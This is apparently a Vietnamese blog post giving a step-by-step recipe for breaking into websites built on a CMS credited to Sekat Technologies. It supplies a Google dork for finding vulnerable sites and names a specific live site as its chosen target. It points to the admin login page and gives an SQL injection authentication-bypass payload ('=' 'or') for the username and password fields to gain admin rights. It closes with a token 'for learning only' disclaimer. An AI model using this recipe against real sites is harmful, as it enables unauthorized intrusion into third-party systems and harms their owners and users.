Mình đi thẳng vào vấn đề luôn nhé
Bước 1: Tìm các Website sử dụng Sket CMS bằng Google
Nhập lệnh tìm kiếm dưới đây vào Google Search
intext:"Developed by Sekat Technologies" -site:https://cxsecurity.com
Bước 2: Chọn bất kỳ 1 Website được liệt kê trong Google
Mình sẽ chọn trang: http://unstccs.com để Test
Bước 3: Truy cập vào Weblogin Admin bằng Link dưới
http://tênwebiste.com/member_login.php
Cụ thể sẽ là:
Bước 4: Khai thác lỗi đăng nhập bằng điền User và Pass như bên dưới:
Username: '=' 'or'
Password: '=' 'or'
Bước 5: Truy cập được vào quyền Admin, việc tiếp theo là của các bạn
Chỉ nên dùng để học tập, đừng phá người khác nhé
No comments:
Post a Comment